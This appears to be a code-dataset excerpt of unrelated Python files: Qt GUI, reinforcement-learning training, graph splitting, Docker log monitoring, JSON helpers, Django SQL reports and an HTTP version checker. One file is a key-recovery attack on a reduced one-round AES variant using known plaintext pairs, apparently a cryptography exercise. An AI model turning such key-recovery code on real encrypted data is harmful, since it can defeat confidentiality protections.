self.svg_widget.renderer().setAspectRatioMode(QtCore.Qt.KeepAspectRatio)
self.parent.setSizePolicy(QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed))
self.tangerine_power.move(350, 20)
self.tangerine_rep_rate.move(350, 100)
self.compressor_delay.move(700, 200)
self.nopa_angle.move(400, 220)
self.nopa_delay.move(150, 630)
def update(self, id: str, value: float):
if id in self._all:
self._all[id].value = value
def main(init_qt=True):
import sys
if init_qt: # used for the test suite
app = QtWidgets.QApplication(sys.argv)
widget = QtWidgets.QWidget()
prog = SetupSVG(widget)
widget.show()
if init_qt:
sys.exit(app.exec_())
return prog, widget
if __name__ == '__main__':
main()
|
15,648 | 2dc1820f241761778c911ce45447ebc424ef2e5b | import binascii
# Standard AES s-box
sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x1, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x4, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x5, 0x9a, 0x7, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x9, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x0, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x2, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0xc, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0xb, 0xdb, 0xe0, 0x32, 0x3a, 0xa, 0x49, 0x6, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x8, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x3, 0xf6, 0xe, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0xd, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0xf, 0xb0, 0x54, 0xbb, 0x16]
# Inverse shift rows to deduce key positions
invShiftRows = [0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12, 1, 6, 11]
# ShiftRows function for the plaintexts
def ShiftRows(state):
new = [-1]*16
# First row, no shift
new[0] = state[0]
new[4] = state[4]
new[8] = state[8]
new[12] = state[12]
# Second row, shift left 1
new[1] = state[5]
new[5] = state[9]
new[9] = state[13]
new[13] = state[1]
# Third row, shift left 2
new[2] = state[10]
new[6] = state[14]
new[10] = state[2]
new[14] = state[6]
# Fourth row, shift left 3
new[3] = state[15]
new[7] = state[3]
new[11] = state[7]
new[15] = state[11]
return bytes(new)
def getKey(number, posssibles):
# Takes a number between 0 and 2^16 - 1 and returns a unique key
key = [-1]*16
for i in range(0, 16):
key[i] = possibles[i][number % 2]
number >>= 1
return bytes(key)
def getRoundKey(key):
# Given an 16-byte master key, get the first round key
roundKey = [-1]*16
# First column (W4)
roundKey[0] = key[0] ^ sbox[key[13]] ^ 1
roundKey[1] = key[1] ^ sbox[key[14]]
roundKey[2] = key[2] ^ sbox[key[15]]
roundKey[3] = key[3] ^ sbox[key[12]]
# Second column (W5)
roundKey[4] = key[4] ^ roundKey[0]
roundKey[5] = key[5] ^ roundKey[1]
roundKey[6] = key[6] ^ roundKey[2]
roundKey[7] = key[7] ^ roundKey[3]
# Third column (W6)
roundKey[8] = key[8] ^ roundKey[4]
roundKey[9] = key[9] ^ roundKey[5]
roundKey[10] = key[10] ^ roundKey[6]
roundKey[11] = key[11] ^ roundKey[7]
# Fourth column (W7)
roundKey[12] = key[12] ^ roundKey[8]
roundKey[13] = key[13] ^ roundKey[9]
roundKey[14] = key[14] ^ roundKey[10]
roundKey[15] = key[15] ^ roundKey[11]
return bytes(roundKey)
def encrypt(input, key):
# Encrypts a 16-byte input with the 16-byte master key provided
roundKey = getRoundKey(key)
key = ShiftRows(key)
state = list(input)
for i in range(0, 16):
# AddRoundKey with master key
state[i] ^= key[i]
# SubBytes
state[i] = sbox[state[i]]
# AddRoundKey with first round key
state[i] ^= roundKey[i]
return bytes(state)
# Load in the two plaintexts and apply ShiftRows
p1 = ShiftRows(b"the economy of m")
p2 = ShiftRows(b"achinery and man")
# Load in the two ciphertexts
c1 = binascii.unhexlify("0c9e246cb8a1bfa3b0e947a1a94c8d11")
c2 = binascii.unhexlify("998fffc15bd9cf74804d59fc23cb6e59")
# Find key values for each position
possibles = [None]*16
for i in range(0, 16):
# Calculate E(x) ^ E(x')
expected = c1[i] ^ c2[i]
# Brute force values of s(x ^ k) ^ s(x' ^ k)
for k in range(0, 256):
result = sbox[p1[i] ^ k] ^ \
sbox[p2[i] ^ k]
if result == expected:
# Find real position of key by reversing ShiftRows
pos = invShiftRows[i]
print("Key byte for pos " + str(pos) + ":", hex(k), chr(k))
# Store the possible key value
if possibles[pos] == None:
possibles[pos] = k
else:
possibles[pos] = (possibles[pos], k)
# Brute force the 2^16 possibilities
print("")
print("Searching keys...")
print("==================")
for i in range(0, 2**16):
key = getKey(i, possibles)
if c1 == encrypt(p1, key) and c2 == encrypt(p2, key):
print("Key is", key.hex(), "(" + str(key) + ")")
|
15,649 | 67ca383fcac79f185792fa827f3bf50b1ef17dae | import argparse
import time
import datetime
import torch_ac
import tensorboardX
import sys
import utils
from utils import device
from model import ACModel
# Parse arguments
parser = argparse.ArgumentParser()
# General parameters
parser.add_argument("--algo", required=True,
help="algorithm to use: a2c | ppo (REQUIRED)")
parser.add_argument("--env", required=True,
help="name of the environment to train on (REQUIRED)")
parser.add_argument("--model", default=None,
help="name of the model (default: {ENV}_{ALGO}_{TIME})")
parser.add_argument("--seed", type=int, default=1,
help="random seed (default: 1)")
parser.add_argument("--log-interval", type=int, default=1,
help="number of updates between two logs (default: 1)")
parser.add_argument("--save-interval", type=int, default=10,
help="number of updates between two saves (default: 10, 0 means no saving)")
parser.add_argument("--procs", type=int, default=16,
help="number of processes (default: 16)")
parser.add_argument("--frames", type=int, default=10**7,
help="number of frames of training (default: 1e7)")
# Parameters for main algorithm
parser.add_argument("--epochs", type=int, default=4,
help="number of epochs for PPO (default: 4)")
parser.add_argument("--batch-size", type=int, default=256,
help="batch size for PPO (default: 256)")
parser.add_argument("--frames-per-proc", type=int, default=None,
help="number of frames per process before update (default: 5 for A2C and 128 for PPO)")
parser.add_argument("--discount", type=float, default=0.99,
help="discount factor (default: 0.99)")
parser.add_argument("--lr", type=float, default=0.001,
help="learning rate (default: 0.001)")
parser.add_argument("--gae-lambda", type=float, default=0.95,
help="lambda coefficient in GAE formula (default: 0.95, 1 means no gae)")
parser.add_argument("--entropy-coef", type=float, default=0.01,
help="entropy term coefficient (default: 0.01)")
parser.add_argument("--value-loss-coef", type=float, default=0.5,
help="value loss term coefficient (default: 0.5)")
parser.add_argument("--max-grad-norm", type=float, default=0.5,
help="maximum norm of gradient (default: 0.5)")
parser.add_argument("--optim-eps", type=float, default=1e-8,
help="Adam and RMSprop optimizer epsilon (default: 1e-8)")
parser.add_argument("--optim-alpha", type=float, default=0.99,
help="RMSprop optimizer alpha (default: 0.99)")
parser.add_argument("--clip-eps", type=float, default=0.2,
help="clipping epsilon for PPO (default: 0.2)")
parser.add_argument("--recurrence", type=int, default=1,
help="number of time-steps gradient is backpropagated (default: 1). If > 1, a LSTM is added to the model to have memory.")
parser.add_argument("--text", action="store_true", default=False,
help="add a GRU to the model to handle text input")
if __name__ == "__main__":
args = parser.parse_args()
args.mem = args.recurrence > 1
# Set run dir
date = datetime.datetime.now().strftime("%y-%m-%d-%H-%M-%S")
default_model_name = f"{args.env}_{args.algo}_seed{args.seed}_{date}"
model_name = args.model or default_model_name
model_dir = utils.get_model_dir(model_name)
# Load loggers and Tensorboard writer
txt_logger = utils.get_txt_logger(model_dir)
csv_file, csv_logger = utils.get_csv_logger(model_dir)
tb_writer = tensorboardX.SummaryWriter(model_dir)
# Log command and all script arguments
txt_logger.info("{}\n".format(" ".join(sys.argv)))
txt_logger.info("{}\n".format(args))
# Set seed for all randomness sources
utils.seed(args.seed)
# Set device
txt_logger.info(f"Device: {device}\n")
# Load environments
envs = []
for i in range(args.procs):
envs.append(utils.make_env(args.env, args.seed + 10000 * i))
txt_logger.info("Environments loaded\n")
# Load training status
try:
status = utils.get_status(model_dir)
except OSError:
status = {"num_frames": 0, "update": 0}
txt_logger.info("Training status loaded\n")
# Load observations preprocessor
obs_space, preprocess_obss = utils.get_obss_preprocessor(envs[0].observation_space)
if "vocab" in status:
preprocess_obss.vocab.load_vocab(status["vocab"])
txt_logger.info("Observations preprocessor loaded")
# Load model
acmodel = ACModel(obs_space, envs[0].action_space, args.mem, args.text)
if "model_state" in status:
acmodel.load_state_dict(status["model_state"])
acmodel.to(device)
txt_logger.info("Model loaded\n")
txt_logger.info("{}\n".format(acmodel))
# Load algo
if args.algo == "a2c":
algo = torch_ac.A2CAlgo(envs, acmodel, device, args.frames_per_proc, args.discount, args.lr, args.gae_lambda,
args.entropy_coef, args.value_loss_coef, args.max_grad_norm, args.recurrence,
args.optim_alpha, args.optim_eps, preprocess_obss)
elif args.algo == "ppo":
algo = torch_ac.PPOAlgo(envs, acmodel, device, args.frames_per_proc, args.discount, args.lr, args.gae_lambda,
args.entropy_coef, args.value_loss_coef, args.max_grad_norm, args.recurrence,
args.optim_eps, args.clip_eps, args.epochs, args.batch_size, preprocess_obss)
else:
raise ValueError("Incorrect algorithm name: {}".format(args.algo))
if "optimizer_state" in status:
algo.optimizer.load_state_dict(status["optimizer_state"])
txt_logger.info("Optimizer loaded\n")
# Train model
num_frames = status["num_frames"]
update = status["update"]
start_time = time.time()
while num_frames < args.frames:
# Update model parameters
update_start_time = time.time()
exps, logs1 = algo.collect_experiences()
logs2 = algo.update_parameters(exps)
logs = {**logs1, **logs2}
update_end_time = time.time()
num_frames += logs["num_frames"]
update += 1
# Print logs
if update % args.log_interval == 0:
fps = logs["num_frames"] / (update_end_time - update_start_time)
duration = int(time.time() - start_time)
return_per_episode = utils.synthesize(logs["return_per_episode"])
rreturn_per_episode = utils.synthesize(logs["reshaped_return_per_episode"])
num_frames_per_episode = utils.synthesize(logs["num_frames_per_episode"])
header = ["update", "frames", "FPS", "duration"]
data = [update, num_frames, fps, duration]
header += ["rreturn_" + key for key in rreturn_per_episode.keys()]
data += rreturn_per_episode.values()
header += ["num_frames_" + key for key in num_frames_per_episode.keys()]
data += num_frames_per_episode.values()
header += ["entropy", "value", "policy_loss", "value_loss", "grad_norm"]
data += [logs["entropy"], logs["value"], logs["policy_loss"], logs["value_loss"], logs["grad_norm"]]
txt_logger.info(
"U {} | F {:06} | FPS {:04.0f} | D {} | rR:μσmM {:.2f} {:.2f} {:.2f} {:.2f} | F:μσmM {:.1f} {:.1f} {} {} | H {:.3f} | V {:.3f} | pL {:.3f} | vL {:.3f} | ∇ {:.3f}"
.format(*data))
header += ["return_" + key for key in return_per_episode.keys()]
data += return_per_episode.values()
if status["num_frames"] == 0:
csv_logger.writerow(header)
csv_logger.writerow(data)
csv_file.flush()
for field, value in zip(header, data):
tb_writer.add_scalar(field, value, num_frames)
# Save status
if args.save_interval > 0 and update % args.save_interval == 0:
status = {"num_frames": num_frames, "update": update,
"model_state": acmodel.state_dict(), "optimizer_state": algo.optimizer.state_dict()}
if hasattr(preprocess_obss, "vocab"):
status["vocab"] = preprocess_obss.vocab.vocab
utils.save_status(status, model_dir)
txt_logger.info("Status saved")
|
15,650 | b0c67052b7d932ac733ad12aa02af93fe2283976 | import networkx as nx
import os
from split_train_test import *
def read_graph(weighted=0, input=None, directed=0):
'''
Reads the input network in networkx.
'''
if weighted:
G = nx.read_edgelist(input, nodetype=int, data=(('weight', float),),
create_using=nx.DiGraph(), delimiter=' ')
else:
G = nx.read_edgelist(input, nodetype=int, create_using=nx.DiGraph(), delimiter=' ')
for edge in G.edges():
G[edge[0]][edge[1]]['weight'] = 1
if not directed:
G = G.to_undirected()
return G
if __name__ == '__main__':
"node_id 从1开始;写入的train和test文件也是从1开始"
dataset_dir = 'D:\hybridrec\dataset\preprocessing_code//' # 改这里
split_dir = 'D:\hybridrec\dataset\split_train_test\preprocessing_code//' # 改这里
train_frac = 0.6
dataset_files = os.listdir(dataset_dir)
for fi in dataset_files:
fi_d = os.path.join(dataset_dir, fi)
if os.path.isdir(fi_d) & \
((fi == 'ca-hepph') or (fi == 'facebook_combined') or (fi == 'yeast')or (fi == 'email-eucore')
# or (fi == 'petster-friendships-hamster') or (fi == 'wiki')
# or (fi == 'usa-airports') or (fi == 'pubmed') or (fi == 'digg_reply')
# or (fi == 'ego-gplus') or (fi == 'enron') or (fi == 'epinions')
): # & (fi == 'router') 在test_ratio = 0.2不可以完全联通地划分
print("dealing: "+str(fi))
# 读
fileName = str(fi) + '_undirected_1_giantCom.edgelist'
filePath = os.path.join(fi_d, fileName)
G = read_graph(weighted=0, input=filePath, directed=0)
# print("G:" + str(len(G)))
# # print("G.edgesNum:" + str(len(G.edges())))
train_E, test_E = split_train_test(G, train_frac=train_frac)
G_train = G
G_train.remove_edges_from(test_E)
# print("G_train:" + str(len(G_train)))
# print("G_train.edgesNum:" + str(len(G_train.edges())))
############################## directed nodeid from 1 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_directed_1_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_directed_1_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.close()
############################## undirected nodeid from 1 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_undirected_1_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_undirected_1_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.write(str(edge[1]) + ' ' + str(edge[0]) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0])+' ' + str(edge[1]) + '\n')
f.write(str(edge[1]) + ' ' + str(edge[0]) + '\n')
f.close()
############################## directed nodeid from 0 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_directed_0_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_directed_0_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.close()
############################## undirected nodeid from 0 ###############################
# 写
write_dir_name = os.path.join(split_dir, fi)
train_write_file_name = 'train_' + fi+'_undirected_0_giantCom.edgelist'
train_write_path = os.path.join(write_dir_name, train_write_file_name)
test_write_file_name = 'test_' + fi + '_undirected_0_giantCom.edgelist'
test_write_path = os.path.join(write_dir_name, test_write_file_name)
if not os.path.exists(write_dir_name):
os.makedirs(write_dir_name)
# nx.write_edgelist(G_train, train_write_path, data=False)
with open(train_write_path, 'w+') as f:
for edge in sorted(train_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.write(str(edge[1]-1) + ' ' + str(edge[0]-1) + '\n')
f.close()
with open(test_write_path, 'w+') as f:
for edge in sorted(test_E):
f.write(str(edge[0]-1)+' ' + str(edge[1]-1) + '\n')
f.write(str(edge[1]-1) + ' ' + str(edge[0]-1) + '\n')
f.close()
pass
pass
# 下面丢弃,仅仅作为参考
# # 读入数据集
# print("----Reading graph......")
# G = read_graph(weighted=0, input=filePath, directed=0)
# nx.write_edgelist(G, 'output/Graph.txt', data=False)
# print(len(G))
# print(len(G.edges()))
#
# # 划分数据集
# train_E, test_E = split_train_test(G, train_frac=0.9)
# G.remove_edges_from(test_E)
# print("G_giantCom :" + str(nx.is_connected(G)))
# nx.write_edgelist(G, 'output/Graph_train.txt', data=False)
# print(len(G))
# print(len(G.edges()))
#
# # 验证最大联通子图
# G_simple = max(nx.connected_component_subgraphs(G), key=len)
# nx.write_edgelist(G_simple, 'output/Graph_train_simple.txt', data=False)
# print(len(G_simple))
# print(len(G_simple.edges()))
pass
|
15,651 | 9b09d3a443e3fcebbfa916522c6350ba03a0462f | #!/usr/bin/env python3
#This is used to keep track of the size of the streetmechant01 container (log) size
import docker
import os
import logging
SCRIPT_LOG = '/var/log/SCRIPT_LOG.log'
IMAGE_NAME = 'ghcr.io/jef/streetmerchant:nightly'
MAX_LOG_SIZE = 300
client = docker.from_env()
all_containers = client.containers.list()
#find the given image
for i in all_containers:
config_dir = i.attrs.get("Config")
loaded_image = config_dir['Image']
if loaded_image == IMAGE_NAME:
log_path = i.attrs.get("LogPath")
dir_size = os.path.getsize(log_path)
dir_size_mb = round(dir_size / 1024 / 1024, 3)
#Create log file to keep track of size
logging.basicConfig(filename=SCRIPT_LOG, filemode='a', format='%(asctime)s: %(levelname)s - %(message)s', level=logging.DEBUG)
log_msg = "Log size: %sMb" % (dir_size_mb)
logging.info(log_msg)
#Clean out log if size exceeds determined max
if dir_size_mb > MAX_LOG_SIZE:
file = open(log_path,"w")
file.close()
print("Log file has been terminated")
logging.warning("Log has been deleted")
|
15,652 | eb407828fbc08a69297dcaf8a7443281e857d040 | import requests
import json
class jsonParser:
searchTermDict = {}
searchTermList = []
fileList = []
def __init__(self, keywordsJSON, localDatabaseJSON, debugMode):
with open(keywordsJSON) as objectAttributes:
self.data = json.load(objectAttributes)
with open(localDatabaseJSON) as localDatabase:
self.databaseInfo = json.load(localDatabase)
for i in self.data["SearchTerms"][0]:
j = self.data["SearchTerms"][0][i]
self.searchTermDict[i] = []
self.searchTermList.append(i)
for z in j:
self.searchTermDict[i].append(z)
if debugMode is True:
print(self.searchTermDict)
def showParsed(self):
for i in self.databaseInfo:
for j in self.searchTermList:
try:
print("Parsing " + i + " " + j + ": " + self.databaseInfo[i][0][j])
except KeyError:
print("Key " + j + " does not exist. please check composition of fileAttributes.json")
def printSearchTerms(self):
print(self.searchTermList)
def findWithAtrributes(self, attributeList):
tempDict = {}
tempDict2 = {}
for i in self.databaseInfo:
tempDict[i] = self.databaseInfo[i]
tempDict2[i] = self.databaseInfo[i]
tempKeys = tempDict.keys()
for i in attributeList:
for j in i.keys():
if j not in self.searchTermList:
print("You searched for a term that was not in the term list.")
break
for i in tempKeys: #go through all our possible files
for j in attributeList: #go through all the entered data
for z in j.keys():
if j[z] != tempDict[i][0][z]:
if i in tempDict2:
del tempDict2[i]
return tempDict2
def scrapeKeys(self, fwaObject):
tempKeys = []
for i in fwaObject.keys():
tempKeys.append(i)
return tempKeys
class jsonWriter:
searchTermDict = {}
searchTermList = []
fileList = []
databasePath = ""
readingPath = ""
def __init__(self, keywordsJSON, localDatabaseJSON, debugMode):
with open(keywordsJSON) as objectAttributes:
self.data = json.load(objectAttributes)
self.readingPath = keywordsJSON
with open(localDatabaseJSON) as localDatabase:
self.databaseInfo = json.load(localDatabase)
self.databasePath = localDatabaseJSON
for i in self.data["SearchTerms"][0]:
j = self.data["SearchTerms"][0][i]
self.searchTermDict[i] = []
self.searchTermList.append(i)
for z in j:
self.searchTermDict[i].append(z)
if debugMode is True:
print(self.searchTermDict)
def showKeys(self):
print(self.searchTermList)
def showParsed(self):
for i in self.databaseInfo:
for j in self.searchTermList:
try:
print("Parsing " + i + " " + j + ": " + self.databaseInfo[i][0][j])
except KeyError:
print("Key " + j + " does not exist. please check composition of fileAttributes.json")
def addData(self, additionalData):
#stolen from http://stackoverflow.com/questions/15415709/update-json-file
innerTempDict = {}
print("Entering data for: " + additionalData)
for i in self.searchTermList:
print("Data: " + i)
temp = input()
innerTempDict[i] = temp
tempDict = {}
tempDict[additionalData] = [innerTempDict]
with open(self.databasePath, "a") as json_file:
json_file.write("{}\n".format(json.dumps(tempDict))[1:-1])
f = open(self.databasePath, "r")
contents = f.readlines()
f.close()
contents.insert(0, "{\n" + contents[len(contents) - 1])
contents.pop()
f = open(self.databasePath, "w")
contents = "".join(contents)
f.write(contents)
f.close()
print("Pre Implementation of JSON management tools for Szism")
print("By: Austin Fell")
dataAddition = jsonWriter("keywords.json", "fileAttributes.json", False)
dataAddition.addData("StartBootstrap-Yomother")
|
15,653 | acb5b4319eccf15169b8746c6e102977a8d9c7b2 | cars = ["Ford", "Volvo", "BMW"]
print(cars)
x = len(cars)
|
15,654 | edf273a1d5c769abc5ab7313187f9299ee06d045 | from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import View
from django.http import JsonResponse
from django import forms
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator
from django.db import connection
from report.models import *
import json
# Create your views here.
def index(request):
return render(request, 'report/base_report.html')
def ReportListAllInvoices(request):
with connection.cursor() as cursor:
cursor.execute('SELECT i.invoice_no as "Invoice No", i.date as "Date" '
' , i.customer_code as "Customer Code", c.name as "Customer Name" '
' , i.due_date as "Due Date", i.total as "Total", i.vat as "VAT", i.amount_due as "Amount Due" '
' , ili.product_code as "Product Code", p.name as "Product Name" '
' , ili.quantity as "Quantity", ili.unit_price as "Unit Price", ili.extended_price as "Extended Price" '
' FROM invoice i JOIN customer c ON i.customer_code = c.customer_code '
' JOIN invoice_line_item ili ON i.invoice_no = ili.invoice_no '
' JOIN product p ON ili.product_code = p.code ')
row = dictfetchall(cursor)
column_name = [col[0] for col in cursor.description]
data_report = dict()
data_report['data'] = row
data_report['column_name'] = column_name
return render(request, 'report/report_list_all_invoices.html', data_report)
def ReportProductsSold(request):
with connection.cursor() as cursor:
cursor.execute('SELECT ili.product_code as "Product Code", p.name as "Product Name" '
' , SUM(ili.quantity) as "Total Quantity Sold", SUM(ili.extended_price) as "Total Value Sold" '
' FROM invoice i JOIN invoice_line_item ili ON i.invoice_no = ili.invoice_no '
' JOIN product p ON ili.product_code = p.code '
' GROUP BY p.code, ili.product_code, p.name ')
row = dictfetchall(cursor)
column_name = [col[0] for col in cursor.description]
data_report = dict()
data_report['data'] = row
data_report['column_name'] = column_name
return render(request, 'report/report_products_sold.html', data_report)
def ReportListAllProducts(request):
with connection.cursor() as cursor:
cursor.execute('SELECT code as "Code", name as "Name", units as "Units" FROM product ')
row = dictfetchall(cursor)
column_name = [col[0] for col in cursor.description]
data_report = dict()
data_report['data'] = row
data_report['column_name'] = column_name
return render(request, 'report/report_list_all_products.html', data_report)
def dictfetchall(cursor):
"Return all rows from a cursor as a dict"
columns = [name[0].replace(" ", "_").lower() for name in cursor.description]
return [
dict(zip(columns, row))
for row in cursor.fetchall()
]
def CursorToDict(data,columns):
result = []
fieldnames = [name.replace(" ", "_").lower() for name in columns]
for row in data:
rowset = []
for field in zip(fieldnames, row):
rowset.append(field)
result.append(dict(rowset))
return result
def ReportListAllReceipt(request):
with connection.cursor() as cursor:
cursor.execute('SELECT r.receipt_no as "Receipt No", r.date as "Receipt Date" '
' , r.customer_code as "Customer Code", r.payment_code as "Payment Method" '
' , r.payment_ref as "Payment Reference", r.remark as "Remarks" '
' , r.total_received as "Total Received", c.name as "Customer Name" '
' , rli.invoice_no as "Invoice No", rli.amount_paid_here as "Amount Paid Here" '
' , i.date as "Invoice Date" '
' FROM receipt r JOIN customer c ON r.customer_code = c.customer_code '
' Join receipt_line_item rli ON r.receipt_no = rli.receipt_no'
' Join invoice i ON rli.invoice_no = i.invoice_no')
row = dictfetchall(cursor)
column_name = [col[0] for col in cursor.description]
data_report = dict()
data_report['data'] = row
data_report['column_name'] = column_name
return render(request, 'report/report_list_all_receipt.html', data_report)
def ReportUnpaidInvoice(request):
with connection.cursor() as cursor:
cursor.execute('SELECT "Invoice No", i.date as "Invoice Date" '
' , c.name as "Customer Name", i.amount_due AS "Invoice Amount Due" '
' , "Invoice Amount Received", i.amount_due - "Invoice Amount Received" AS "Invoice Amount Not Paid" '
' FROM( SELECT rli.invoice_no as "Invoice No", SUM(rli.amount_paid_here) as "Invoice Amount Received" '
' FROM receipt_line_item as rli '
' GROUP BY rli.invoice_no ) as li '
' JOIN invoice as i '
' ON li."Invoice No" = i.invoice_no '
' INNER JOIN customer as c '
' ON i.customer_code = c.customer_code')
row1 = dictfetchall(cursor)
column_name1 = [col[0] for col in cursor.description]
cursor.execute ('SELECT SUM(i.amount_due - "Invoice Amount Received") AS "Total invoice amount not paid", COUNT(li) AS "Number of Invoice not paid" '
' FROM(SELECT rli.invoice_no AS "Invoice No", SUM(rli.amount_paid_here) as "Invoice Amount Received" '
' FROM receipt_line_item as rli '
' GROUP BY rli.invoice_no )as li '
' INNER JOIN invoice as i '
' ON li."Invoice No" = i.invoice_no '
' WHERE i.amount_due - "Invoice Amount Received" != 0 ')
row2 = dictfetchall(cursor)
data_report = dict()
data_report['data'] = row1
data_report['column_name'] = column_name1
data_report['data2'] = row2
return render(request, 'report/report_unpaid_invoice.html', data_report)
|
15,655 | c6b73417b2dd2e133b6b9b1fa5215d61b259164d | """
Name: Raymond Wang
ID: V00802086
Date: JAN 26, 2018
"""
import socket
import sys
import ssl
def main():
if len(sys.argv) != 2:
print("INVALID INPUT")
return
print('\nWebsite: ' + sys.argv[1])
ip_address = socket.gethostbyname(socket.getfqdn(sys.argv[1])) # Get IP address
print('IP: ' + ip_address)
address = (ip_address, 443) # HTTPS
try:
sock = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) # Wrap the socket
sock.settimeout(1)
if sock.connect(address) != socket.error: # Check for HTTPS support
print('Support of HTTPS: YES')
https = True
sock.close()
except Exception as e:
print('Support of HTTPS: NO ', e) # Not support HTTPS
https = False
try:
context = get_http2_ssl_context()
connection = establish_tcp_connection(sys.argv[1])
negotiate_tls(connection, context, sys.argv[1])
print('The newest HTTP versions that the web server supports: HTTP/2')
support_http2 = True
except Exception as e:
support_http2 = False
if https:
print('Connecting over port 443...\n')
port443(ip_address, support_http2)
else:
print('Connecting over port 80...\n')
port80(ip_address, support_http2)
def port80(ip_address, support_http2):
s = ''
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
address = (ip_address, 80) # HTTP
sock.connect(address) # Connect to HTTP address
count = sock.sendall(bytes('GET / HTTP/1.1\r\nHost: ' + sys.argv[1] + '\r\nConnection: keep-alive\r\n\r\n',
'utf8')) # GET request
if count == 0: # If failed to send
print('Failed to check HTTP')
buf = sock.recv(1024) # Receiving response
while len(buf):
s = s + bytes.decode(buf)
buf = sock.recv(1024)
except Exception as e:
sock.close()
count = 0
while True:
index = s.find('\n')
if index == -1:
s2 = s
else:
s2 = s[:index]
if len(s2) == 0 or s2[0] == '\r':
break
if s2.find('HTTP') == 0: # Checking HTTP version
if not support_http2: # If not HTTP/2
print('The newest HTTP versions that the web server supports: ' + s2[:8])
s7 = s2[9:12]
if s7 == '505': # Check status code
print('Status code: ' + s7 + ' - HTTP version not supported')
if s7 == '404':
print('Status code: ' + s7 + ' - File not found')
if s7 == '301':
print('Status code: ' + s7 + ' - Moved permanently')
print('Redirecting to new location... (over port 443)\n')
port443(ip_address, support_http2) # port443 to new location
break
if s7 == '302':
print('Status code: ' + s7 + ' - Found')
print('Redirecting to new location... (over port 443)\n')
port443(ip_address, support_http2) # port443 to new location
break
if s7 == '200':
print('Status code: ' + s7 + ' - OK')
else:
print('Status code: ' + s7)
